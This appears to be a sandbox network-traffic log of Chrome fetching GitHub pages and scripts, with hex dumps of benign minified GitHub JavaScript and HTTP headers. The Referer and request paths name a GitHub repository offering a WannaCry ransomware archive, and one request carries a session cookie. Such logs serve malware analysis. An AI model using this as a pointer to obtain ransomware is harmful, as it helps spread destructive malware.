                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 65 74 20 74 20 6f 66 28 22 44 45 54 41 49 4c 53 22 3d 3d 3d 65 2e 74 61 67 4e 61 6d 65 26 26 65 2e 69 64 26 26 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 6f 70 65 6e 22 29 26 26 6c 2e 70 75 73 68 28 65 2e 69 64 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 6a 73 2d 75 70 64 61 74 61 62 6c 65 2d 63 6f 6e 74 65 6e 74 2d 70 72 65 73 65 72 76 65 2d 73 63 72 6f 6c 6c 2d 70 6f 73 69 74 69 6f 6e 22 29 29 29 7b 6c 65 74 20 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 75 70 64 61 74 61 62 6c 65 2d 63 6f 6e 74 65 6e 74 2d 73 63 72 6f 6c 6c 2d 70 6f 73 69 74 69 6f 6e 2d 69 64 22 29 7c 7c 22 22 3b 79 2e 73 65 74 28 65 2c 74 2e 73 63 72 6f 6c 6c 54 6f 70 29 7d 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 6c 29 7b 6c 65 74
                                                                                      Data Ascii: et t of("DETAILS"===e.tagName&&e.id&&e.hasAttribute("open")&&l.push(e.id),e.querySelectorAll(".js-updatable-content-preserve-scroll-position"))){let e=t.getAttribute("data-updatable-content-scroll-position-id")||"";y.set(e,t.scrollTop)}for(let e of l){let
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 61 6e 20 76 61 6c 75 65 22 29 7d 65 6c 73 65 7b 69 66 28 22 63 68 65 63 6b 62 6f 78 22 3d 3d 3d 65 2e 74 79 70 65 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 63 68 65 63 6b 62 6f 78 20 63 61 6e 27 74 20 62 65 20 73 65 74 20 74 6f 20 73 74 72 69 6e 67 20 76 61 6c 75 65 22 29 3b 65 2e 76 61 6c 75 65 3d 74 7d 6f 28 65 2c 22 63 68 61 6e 67 65 22 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 66 6f 72 28 6c 65 74 20 6e 20 69 6e 20 74 29 7b 6c 65 74 20 72 3d 74 5b 6e 5d 2c 6f 3d 65 2e 65 6c 65 6d 65 6e 74 73 2e 6e 61 6d 65 64 49 74 65 6d 28 6e 29 3b 6f 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70 75 74 45 6c 65 6d 65 6e 74 3f 6f 2e 76 61 6c 75 65 3d 72 3a 6f 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 54 65 78 74 41 72
                                                                                      Data Ascii: an value")}else{if("checkbox"===e.type)throw TypeError("checkbox can't be set to string value");e.value=t}o(e,"change",!1)}function l(e,t){for(let n in t){let r=t[n],o=e.elements.namedItem(n);o instanceof HTMLInputElement?o.value=r:o instanceof HTMLTextAr
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 63 61 6d 70 61 69 67 6e 22 2c 22 75 74 6d 5f 74 65 72 6d 22 2c 22 75 74 6d 5f 63 6f 6e 74 65 6e 74 22 2c 22 73 63 69 64 22 5d 3b 74 72 79 7b 6c 65 74 20 65 3d 28 30 2c 6f 2e 6e 29 28 22 6f 63 74 6f 6c 79 74 69 63 73 22 29 3b 64 65 6c 65 74 65 20 65 2e 62 61 73 65 43 6f 6e 74 65 78 74 2c 72 3d 6e 65 77 20 69 2e 52 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 6c 65 74 20 74 3d 28 30 2c 6f 2e 6e 29 28 22 6f 63 74 6f 6c 79 74 69 63 73 22 29 2e 62 61 73 65 43 6f 6e 74 65 78 74 7c 7c 7b 7d 3b 69 66 28 74 29 66 6f 72 28 6c 65 74 5b 65 2c 6e 5d 6f 66 28 64 65 6c 65 74 65 20 74 2e 61 70 70 5f 69 64 2c 64 65 6c 65 74 65 20 74 2e 65 76 65 6e 74 5f 75 72 6c 2c 64 65 6c 65 74 65 20 74 2e 68 6f 73 74 2c 4f 62 6a 65 63 74 2e 65 6e
                                                                                      Data Ascii: campaign","utm_term","utm_content","scid"];try{let e=(0,o.n)("octolytics");delete e.baseContext,r=new i.R(e)}catch(e){}function d(e){let t=(0,o.n)("octolytics").baseContext||{};if(t)for(let[e,n]of(delete t.app_id,delete t.event_url,delete t.host,Object.en
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 6d 6f 72 70 68 65 75 73 2d 69 67 6e 6f 72 65 22 29 29 7b 6c 65 74 20 65 3d 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 6f 72 70 68 65 75 73 2d 69 67 6e 6f 72 65 22 29 7c 7c 22 22 29 2e 74 72 69 6d 28 29 2e 73 70 6c 69 74 28 2f 5c 73 2b 2f 29 3b 66 6f 72 28 6c 65 74 20 72 20 6f 66 20 65 29 74 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 72 29 3f 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 7c 7c 22 22 29 3a 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 72 29 7d 72 65 74 75 72 6e 20 65 3f 2e 6b 65 65 70 49 6e 70 75 74 56 61 6c 75 65 73 26 26 28 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70 75 74 45 6c 65 6d 65 6e 74 26 26 6e 2e 74 79 70 65 3d 3d 3d 74 2e 74
                                                                                      Data Ascii: morpheus-ignore")){let e=(t.getAttribute("data-morpheus-ignore")||"").trim().split(/\s+/);for(let r of e)t.hasAttribute(r)?n.setAttribute(r,t.getAttribute(r)||""):n.removeAttribute(r)}return e?.keepInputValues&&(n instanceof HTMLInputElement&&n.type===t.t
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 2c 72 2e 5a 29 28 65 2c 73 2c 6f 28 6e 29 29 7d 7d 2c 35 32 32 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 72 3a 28 29 3d 3e 6c 7d 29 3b 76 61 72 20 72 3d 6e 28 34 37 39 34 30 29 2c 6f 3d 6e 28 35 30 36 35 35 29 3b 6c 65 74 20 69 3d 22 70 61 72 73 65 2d 68 74 6d 6c 2d 6e 6f 2d 6f 70 22 2c 61 3d 72 2e 5a 4f 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 69 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 65 3d 3e 6f 2e 4f 2e 61 70 70 6c 79 28 7b 70 6f 6c 69 63 79 3a 28 29 3d 3e 65 2c 70 6f 6c 69 63 79 4e 61 6d 65 3a 69 2c 66 61 6c 6c 62 61 63 6b 3a 65 2c 73 61 6e 69 74 69 7a 65 3a 21 31 2c 66 61 6c 6c 62 61 63 6b 4f 6e 45 72 72 6f 72 3a 21 30 7d 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 65 2e 63 72 65 61 74 65 45 6c 65 6d
                                                                                      Data Ascii: ,r.Z)(e,s,o(n))}},5223:(e,t,n)=>{n.d(t,{r:()=>l});var r=n(47940),o=n(50655);let i="parse-html-no-op",a=r.ZO.createPolicy(i,{createHTML:e=>o.O.apply({policy:()=>e,policyName:i,fallback:e,sanitize:!1,fallbackOnError:!0})});function l(e,t){let n=e.createElem
                                                                                      2024-03-23 14:47:23 UTC1266INData Raw: 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 5a 4f 3a 28 29 3d 3e 75 7d 29 3b 76 61 72 20 72 2c 6f 3d 6e 28 37 31 32 30 37 29 2c 69 3d 6e 28 34 33 37 38 36 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 28 29 3d 3e 7b 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 60 54 68 65 20 70 6f 6c 69 63 79 20 64 6f 65 73 20 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 20 74 68 65 20 66 75 6e 63 74 69 6f 6e 20 24 7b 65 7d 60 29 7d 7d 6c 65 74 20 6c 3d 7b 63 72 65 61 74 65 48 54 4d 4c 3a 61 28 22 63 72 65 61 74 65 48 54 4d 4c 22 29 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 61 28 22 63 72 65 61 74 65 53 63 72 69 70 74 22 29 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 61 28 22 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 22 29 7d 2c 73 3d 28 72 3d 67 6c 6f
                                                                                      Data Ascii: n)=>{n.d(t,{ZO:()=>u});var r,o=n(71207),i=n(43786);function a(e){return()=>{throw TypeError(`The policy does not implement the function ${e}`)}}let l={createHTML:a("createHTML"),createScript:a("createScript"),createScriptURL:a("createScriptURL")},s=(r=glo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      36192.168.2.1649740185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC736OUTGET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-9de4213015af.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 15015
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 22 Feb 2024 16:53:07 GMT
                                                                                      ETag: 0x8DC33C6BE772D99
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 1921672
                                                                                      X-Served-By: cache-iad-kcgs7200120-IAD, cache-ewr18166-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 404, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 58cb54fd5a8a62198faf67be44fbde78fe9fe5fa
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 74 61 73 6b 2d 6c 69 73 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6f 6e 66 6f 63 75 73 5f 74 73 2d 61 70 70 5f 61 73 73 2d 34 32 31 63 65 63 22 5d 2c 7b 33 36 39 34 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 4c 24 3a 28 29 3d 3e 75 2c 53 45 3a 28 29 3d 3e 41 2c 6e 6a 3a 28 29 3d 3e 64 7d 29 3b 76 61 72 20 73 2c 72 3d 6e 28 38 33 38 33 33 29 2c 6c 3d 6e 28 35 39 37 35
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec"],{3694:(e,t,n)=>{n.d(t,{L$:()=>u,SE:()=>A,nj:()=>d});var s,r=n(83833),l=n(5975
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 74 61 73 6b 5f 6c 69 73 74 5f 6b 65 79 22 29 2c 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 76 61 6c 75 65 22 2c 6e 29 2c 73 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 72 29 7d 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 69 73 2d 63 6f 6d 6d 65 6e 74 2d 73 74 61 6c 65 22 29 2c 28 30 2c 63 2e 42 74 29 28 73 29 7d 28 30 2c 69 2e 4e 37 29 28 22 2e 6a 73 2d 74 61 73 6b 2d 6c 69 73 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 6a 73 2d 74 61 73 6b 2d 6c 69 73 74 2d 66 69 65 6c 64 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b
                                                                                      Data Ascii: createElement("input");r.setAttribute("type","hidden"),r.setAttribute("name","task_list_key"),r.setAttribute("value",n),s.appendChild(r)}e.classList.remove("is-comment-stale"),(0,c.Bt)(s)}(0,i.N7)(".js-task-list-container .js-task-list-field",function(e){
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 6e 3b 6c 65 74 20 73 3d 65 2e 63 6c 6f 73 65 73 74 28 22 2e 6a 73 2d 74 61 73 6b 2d 6c 69 73 74 2d 63 6f 6e 74 61 69 6e 65 72 22 29 2c 72 3d 65 2e 65 6c 65 6d 65 6e 74 73 2e 6e 61 6d 65 64 49 74 65 6d 28 22 74 61 73 6b 5f 6c 69 73 74 5f 74 72 61 63 6b 22 29 3b 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 26 26 72 2e 72 65 6d 6f 76 65 28 29 3b 6c 65 74 20 6c 3d 65 2e 65 6c 65 6d 65 6e 74 73 2e 6e 61 6d 65 64 49 74 65 6d 28 22 74 61 73 6b 5f 6c 69 73 74 5f 6f 70 65 72 61 74 69 6f 6e 22 29 3b 6c 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 26 26 6c 2e 72 65 6d 6f 76 65 28 29 3b 74 72 79 7b 6e 3d 61 77 61 69 74 20 74 2e 6a 73 6f 6e 28 29 7d 63 61 74 63 68 28 74 29 7b 6c 65 74 20 65 3b 74 72 79 7b
                                                                                      Data Ascii: on(e,t){let n;let s=e.closest(".js-task-list-container"),r=e.elements.namedItem("task_list_track");r instanceof Element&&r.remove();let l=e.elements.namedItem("task_list_operation");l instanceof Element&&l.remove();try{n=await t.json()}catch(t){let e;try{
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 2f 2c 22 22 29 2e 73 74 61 72 74 73 57 69 74 68 28 60 24 7b 79 7d 2e 60 29 29 7b 6c 65 74 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 60 24 7b 79 7d 60 2c 60 24 7b 79 2b 31 7d 60 29 3b 72 65 74 75 72 6e 20 79 2b 3d 31 2c 74 7d 72 65 74 75 72 6e 20 65 7d 29 2e 6a 6f 69 6e 28 22 5c 6e 22 29 2c 6c 3d 5b 6e 2c 6e 2b 74 2e 6c 65 6e 67 74 68 5d 2c 6f 3d 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 6e 29 2b 74 7d 72 65 74 75 72 6e 7b 74 65 78 74 3a 6f 2c 61 75 74 6f 63 6f 6d 70 6c 65 74 65 50 72 65 66 69 78 3a 74 2c 73 65 6c 65 63 74 69 6f 6e 3a 5b 6e 2b 72 2c 6e 2b 72 5d 2c 63 6f 6d 6d 61 6e 64 49 64 3a 22 69 6e 73 65 72 74 54 65 78 74 22 2c 77 72 69 74 65 53 65 6c 65 63 74 69 6f 6e 3a 6c 7d 7d 7b 6c 65 74 20 74 3d 6e 2d 60 0a 24 7b 6f 7d 60 2e 6c 65 6e 67 74 68 3b 72
                                                                                      Data Ascii: /,"").startsWith(`${y}.`)){let t=e.replace(`${y}`,`${y+1}`);return y+=1,t}return e}).join("\n"),l=[n,n+t.length],o=e.substring(0,n)+t}return{text:o,autocompletePrefix:t,selection:[n+r,n+r],commandId:"insertText",writeSelection:l}}{let t=n-`${o}`.length;r
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 74 72 69 6e 67 28 30 2c 6e 29 2b 69 2b 65 2e 73 75 62 73 74 72 69 6e 67 28 6e 29 2c 61 75 74 6f 63 6f 6d 70 6c 65 74 65 50 72 65 66 69 78 3a 69 2c 73 65 6c 65 63 74 69 6f 6e 3a 5b 6e 2b 69 2e 6c 65 6e 67 74 68 2c 6e 2b 69 2e 6c 65 6e 67 74 68 5d 2c 63 6f 6d 6d 61 6e 64 49 64 3a 22 69 6e 73 65 72 74 54 65 78 74 22 2c 77 72 69 74 65 53 65 6c 65 63 74 69 6f 6e 3a 5b 6e 75 6c 6c 2c 6e 75 6c 6c 5d 7d 7d 28 74 2e 76 61 6c 75 65 2c 5b 74 2e 73 65 6c 65 63 74 69 6f 6e 53 74 61 72 74 2c 74 2e 73 65 6c 65 63 74 69 6f 6e 45 6e 64 5d 29 3b 76 6f 69 64 20 30 21 3d 3d 6e 26 26 28 79 28 74 2c 6e 29 2c 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 28 30 2c 6c 2e 66 29 28 74 2c 22 63 68 61 6e 67 65 22 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 70 3d 21
                                                                                      Data Ascii: tring(0,n)+i+e.substring(n),autocompletePrefix:i,selection:[n+i.length,n+i.length],commandId:"insertText",writeSelection:[null,null]}}(t.value,[t.selectionStart,t.selectionEnd]);void 0!==n&&(y(t,n),e.preventDefault(),(0,l.f)(t,"change"))}}function k(){p=!
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 73 65 72 74 54 65 78 74 3d 22 69 6e 73 65 72 74 54 65 78 74 22 2c 65 2e 64 65 6c 65 74 65 3d 22 64 65 6c 65 74 65 22 7d 28 73 7c 7c 28 73 3d 7b 7d 29 29 3b 6c 65 74 20 53 3d 2f 5e 28 5c 73 2a 29 3f 2f 2c 78 3d 2f 5e 28 5c 73 2a 29 28 5b 2a 2d 5d 7c 28 5c 64 2b 29 5c 2e 29 5c 73 28 5c 5b 5b 5c 73 78 5d 5c 5d 5c 73 29 3f 2f 3b 66 75 6e 63 74 69 6f 6e 20 41 28 65 29 7b 6c 65 74 20 74 3d 65 2e 63 6c 6f 73 65 73 74 28 22 74 61 73 6b 2d 6c 69 73 74 73 22 29 3b 69 66 28 21 74 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 70 61 72 65 6e 74 20 6e 6f 74 20 66 6f 75 6e 64 22 29 3b 6c 65 74 20 6e 3d 41 72 72 61 79 2e 66 72 6f 6d 28 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 6f 6c 2c 20 75 6c 22 29 29 2e 66 69 6c 74 65
                                                                                      Data Ascii: tion(e){e.insertText="insertText",e.delete="delete"}(s||(s={}));let S=/^(\s*)?/,x=/^(\s*)([*-]|(\d+)\.)\s(\[[\sx]\]\s)?/;function A(e){let t=e.closest("task-lists");if(!t)throw Error("parent not found");let n=Array.from(t.querySelectorAll("ol, ul")).filte
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 62 6c 75 72 22 2c 73 29 29 7d 69 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 6e 29 2c 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 62 6c 75 72 22 2c 73 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 6c 65 74 7b 63 75 72 72 65 6e 74 54 61 72 67 65 74 3a 73 7d 3d 65 3b 73 26 26 28 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 69 6e 70 75 74 22 2c 74 29 2c 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 62 6c 75 72 22 2c 6e 29 29 7d 69 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 69
                                                                                      Data Ascii: ventListener("blur",s))}i(t,function(t){t.addEventListener(e,n),t.addEventListener("blur",s)})}function c(e,t){function n(e){let{currentTarget:s}=e;s&&(s.removeEventListener("input",t),s.removeEventListener("blur",n))}i(e,function(e){e.addEventListener("i
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 75 65 73 74 65 64 2d 57 69 74 68 22 3a 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 7d 7d 29 2c 72 3d 61 77 61 69 74 20 73 2e 6a 73 6f 6e 28 29 3b 72 65 74 75 72 6e 20 72 7d 28 30 2c 6e 28 33 36 30 37 31 29 2e 4e 37 29 28 22 2e 6a 73 2d 73 73 6f 2d 6d 6f 64 61 6c 2d 63 6f 6d 70 6c 65 74 65 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 77 69 6e 64 6f 77 2e 6f 70 65 6e 65 72 26 26 77 69 6e 64 6f 77 2e 6f 70 65 6e 65 72 2e 65 78 74 65 72 6e 61 6c 2e 73 73 6f 43 6f 6d 70 6c 65 74 65 29 7b 6c 65 74 20 74 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 65 72 72 6f 72 22 29 2c 6e 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 65 78 70 69 72 65 73 2d 61 72 6f 75 6e 64 22 29 3b 77 69 6e 64 6f 77 2e 6f 70 65 6e 65 72 2e
                                                                                      Data Ascii: uested-With":"XMLHttpRequest"}}),r=await s.json();return r}(0,n(36071).N7)(".js-sso-modal-complete",function(e){if(window.opener&&window.opener.external.ssoComplete){let t=e.getAttribute("data-error"),n=e.getAttribute("data-expires-around");window.opener.
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 3a 28 29 3d 3e 75 2c 46 72 3a 28 29 3d 3e 64 2c 61 5f 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 73 3d 6e 28 35 32 32 33 29 3b 6c 65 74 20 72 3d 63 6c 61 73 73 20 52 65 73 70 6f 6e 73 65 45 72 72 6f 72 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 29 7b 73 75 70 65 72 28 60 24 7b 65 7d 20 66 6f 72 20 48 54 54 50 20 24 7b 74 2e 73 74 61 74 75 73 7d 60 29 2c 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 3d 74 7d 7d 3b 76 61 72 20 6c 3d 6e 28 34 37 39 34 30 29 2c 6f 3d 6e 28 35 30 36 35 35 29 3b 6c 65 74 20 69 3d 22 73 65 72 76 65 72 2d 78 2d 73 61 66 65 2d 68 74 6d 6c 22 2c 61 3d 6c 2e 5a 4f 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 69 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 28 65 2c 74 29 3d 3e 6f 2e 4f 2e 61 70 70 6c 79 28
                                                                                      Data Ascii: :()=>u,Fr:()=>d,a_:()=>c});var s=n(5223);let r=class ResponseError extends Error{constructor(e,t){super(`${e} for HTTP ${t.status}`),this.response=t}};var l=n(47940),o=n(50655);let i="server-x-safe-html",a=l.ZO.createPolicy(i,{createHTML:(e,t)=>o.O.apply(
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 4c 48 74 74 70 52 65 71 75 65 73 74 22 29 3b 6c 65 74 20 69 3d 61 77 61 69 74 20 73 65 6c 66 2e 66 65 74 63 68 28 6f 29 3b 69 66 28 72 2e 69 6e 63 6c 75 64 65 73 28 69 2e 73 74 61 74 75 73 29 29 72 65 74 75 72 6e 20 61 77 61 69 74 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 65 3d 3e 73 65 74 54 69 6d 65 6f 75 74 28 65 2c 6c 29 29 2c 6e 28 31 2e 35 2a 6c 29 3b 69 66 28 73 2e 69 6e 63 6c 75 64 65 73 28 69 2e 73 74 61 74 75 73 29 29 72 65 74 75 72 6e 20 69 3b 69 66 28 69 2e 73 74 61 74 75 73 3c 32 30 30 7c 7c 69 2e 73 74 61 74 75 73 3e 3d 33 30 30 29 74 68 72 6f 77 20 45 72 72 6f 72 28 60 48 54 54 50 20 24 7b 69 2e 73 74 61 74 75 73 7d 24 7b 69 2e 73 74 61 74 75 73 54 65 78 74 7c 7c 22 22 7d 60 29 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 60 55 6e 65 78 70 65 63 74
                                                                                      Data Ascii: LHttpRequest");let i=await self.fetch(o);if(r.includes(i.status))return await new Promise(e=>setTimeout(e,l)),n(1.5*l);if(s.includes(i.status))return i;if(i.status<200||i.status>=300)throw Error(`HTTP ${i.status}${i.statusText||""}`);throw Error(`Unexpect


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      37192.168.2.1649741140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC816OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/security/overall-count HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no
                                                                                      2024-03-23 14:47:23 UTC458INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Content-Type: text/fragment+html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Cache-Control: max-age=14400, private
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
